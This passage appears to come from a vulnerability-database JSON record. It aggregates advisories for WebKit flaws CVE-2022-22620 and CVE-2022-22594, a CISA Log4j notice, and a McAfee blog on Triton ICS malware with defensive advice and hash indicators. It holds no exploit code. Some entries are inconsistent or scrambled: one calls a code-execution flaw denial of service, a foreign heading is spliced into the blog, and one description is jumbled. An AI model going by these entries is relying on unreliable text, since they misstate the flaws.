"modified": "2022-03-18T00:00:00", "id": "UB:CVE-2022-22620", "href": "https://ubuntu.com/security/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-11-27T15:14:19", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "debiancve", "title": "CVE-2022-22594", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-18T18:15:00", "id": "DEBIANCVE:CVE-2022-22594", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-27T15:14:19", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "debiancve", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-03-18T18:15:00", "id": "DEBIANCVE:CVE-2022-22620", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-17T12:58:20", "description": "webkit2gtk:edge is vulnerable denial of service.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-02-05T14:50:27", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-18T20:37:27", "id": "VERACODE:34009", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34009/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-09-01T08:11:26", "description": "webkit2gtk edge is vulnerable to denial of service. This allows an attacker to process maliciously crafted web content and arbitrarily execute codes in the system.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-21T06:52:19", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-04-12T12:43:40", "id": "VERACODE:34313", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34313/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-03-26T11:28:12", "description": "CISA has added one new vulnerability to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerability listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \n \nCVE-2022-22620\n\n| \n\nApple Webkit Remote Code Execution Vulnerability\n\n| \n\n2/25/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/02/11/cisa-adds-one-known-exploited-vulnerability-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-11T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T00:00:00", "id": "CISA:7135D71F3A4288760C8E71D4E553A3B4", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/02/11/cisa-adds-one-known-exploited-vulnerability-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-15T11:40:48", "description": "Ivanti has updated its [Log4j Advisory](<https://forums.ivanti.com/s/article/CVE-2021-44228-Java-logging-library-log4j-Ivanti-Products-Impact-Mapping?language=en_US>) with security updates for multiple products to address CVE-2021-44228. An unauthenticated attacker could exploit this vulnerability to take control of an affected system.\n\nCISA encourages users and administrators to review the Ivanti security advisories pages for [Avalanche](<https://forums.ivanti.com/s/article/CVE-2021-44228-Avalanche-Remote-code-injection-Log4j?language=en_US>); [File Director](< https://forums.ivanti.com/s/article/Apache-Log4j-Zero-Day-Vulnerability-and-Ivanti-File-Director-CVE-2021-44228?language=en_US>); and [MobileIron Core, MobileIron Sentry (Core/Cloud), and MobileIron Core Connector](<https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j>) and apply the necessary updates and workarounds.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/14/ivanti-updates-log4j-advisory-security-updates-multiple-products>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T00:00:00", "type": "cisa", "title": "Ivanti Updates Log4j Advisory with Security Updates for Multiple Products \u00a0", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T00:00:00", "id": "CISA:006B1DC6A817621E16EEB4560519A418", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/14/ivanti-updates-log4j-advisory-security-updates-multiple-products", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-11-27T15:37:31", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "alpinelinux", "title": "CVE-2022-22620", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "id": "ALPINE:CVE-2022-22620", "href": "https://security.alpinelinux.org/vuln/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T15:37:31", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "alpinelinux", "title": "CVE-2022-22594", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-28T16:40:00", "id": "ALPINE:CVE-2022-22594", "href": "https://security.alpinelinux.org/vuln/CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-11-26T02:03:49", "description": "A use-after-free vulnerability exists in Apple OS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-30T00:00:00", "type": "checkpoint_advisories", "title": "Apple OS Use After Free (CVE-2022-22620)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-06-30T00:00:00", "id": "CPAI-2022-0325", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-11-27T15:25:01", "description": "A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-01-31T20:47:48", "type": "redhatcve", "title": "CVE-2022-22594", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2023-04-06T09:27:43", "id": "RH:CVE-2022-22594", "href": "https://access.redhat.com/security/cve/cve-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-27T15:24:38", "description": "A use-after-free vulnerability was found in WebKitGTK. The vulnerability occurs when processing HTML content in WebKit. This flaw allows a remote attacker to trick the victim into opening a specially crafted web page, triggering a use-after-free error and leading to the execution of arbitrary code on the system.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-21T10:46:56", "type": "redhatcve", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2023-04-06T09:27:50", "id": "RH:CVE-2022-22620", "href": "https://access.redhat.com/security/cve/cve-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2023-11-27T15:33:19", "description": "Fix accessibility not working when the Bubblewrap sandbox is enabled. Fix rendering of scrollbars when overlay scrollbars are disabled. Fix the build when the X11 support is disabled. Fix the build in a number of situations where the main OpenGL library is not called libGL or libgl, as is the case on systems that use libglvnd. Fix several crashes and rendering issues. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been A use after free issue was addressed with improved memory management. (CVE-2022-22620) \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-18T10:15:30", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-18T10:15:30", "id": "MGASA-2022-0075", "href": "https://advisories.mageia.org/MGASA-2022-0075.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "trellix": [{"lastseen": "2018-11-08T00:00:00", "description": "# Triton Malware Spearheads Latest Attacks on Industrial Systems | McAfee Blogs\n\nThomas Roccia \u00b7 NOV 08, 2018\n\nMalware that attacks industrial control systems (ICS), such as the [Stuxnet campaign](<https://www.mcafee.com/enterprise/en-us/security-awareness/what-is-stuxnet.html>) in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.\n\nICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.\n\nIn August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware\u2014dubbed Triton, Trisis, or HatMan\u2014attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.\n\nAfter gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an [accidental shutdown](<https://www.darkreading.com/attacks-breaches/triton-attacker-disrupts-ics-operations-while-botching-attempt-to-cause-physical-damage-/d/d-id/1330650>) of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.\n\n## CVE-2022-22620: Apple finally gave something away for free!\n\nHistory of ICS malware \n\nIn 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.\n\nIn 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.\n\nBlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.\n\nIn 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet\u2019s. It is unclear if this was a proof of concept or a simple penetration-testing tool.\n\nIndustroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine\u2019s power grid.\n\nIn 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.\n\n\n\nICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.\n\nFacing widespread risks, critical infrastructures need a specific approach to stay safe.\n\nICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.\n\n### Triton framework\n\nTriton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.\n\nThe attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.\n\n\n\nTo communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.\n\nNozomi Networks has created a [Wireshark dissector](<https://github.com/NozomiNetworks/tricotools>) that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the \u201crunning state\u201d of the controller to perform the next stages of the attack.\n\n\n\nIn the preceding screen Triconex replies to the request \u201cGet Control Program Status,\u201d which is sent by Triton.\n\nThe Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.\n\nThe following schema shows the main modules of Triton:\n\n\n\nThe missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.\n\n### How to detect an unusual network connection\n\n[Nozomi Networks has created a script](<https://github.com/NozomiNetworks/tricotools>) that simulates a Triconex safety controller. We modified this script with a Raspberry Pi to create a cheap detector tool.\n\n&lt;br /&gt;\n\nThis inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.\n\nThe following picture shows how to connect the LED and buzzer.\n\n\n\n### Fighting ICS malware\n\nICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS\u2019s are now exposed to connected environments they were not designed for.\n\nStandard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.\n\nFurther security recommendations:\n\n * Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and double factor, card readers, surveillance cameras, etc.\n * Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network\n * Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges\n * Log and monitor every action on the ICS network to quickly identify a point of failure\n * When possible implement redundancy on critical devices to avoid major issues\n * Develop strong security policies and an incident response plan to restore systems during an incident\n * Train people with simulated incident responses and security awareness\n\nAttackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.\n\n### Indicators of compromise\n\n * dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe\n * b47ad4840089247b058121e95732beb82e6311d0: imain.bin\n * f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin\n * 91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py\n * 1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip\n * 97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc\n * d6e997a4b6a54d1aeedb646731f3b0893aee4b82: 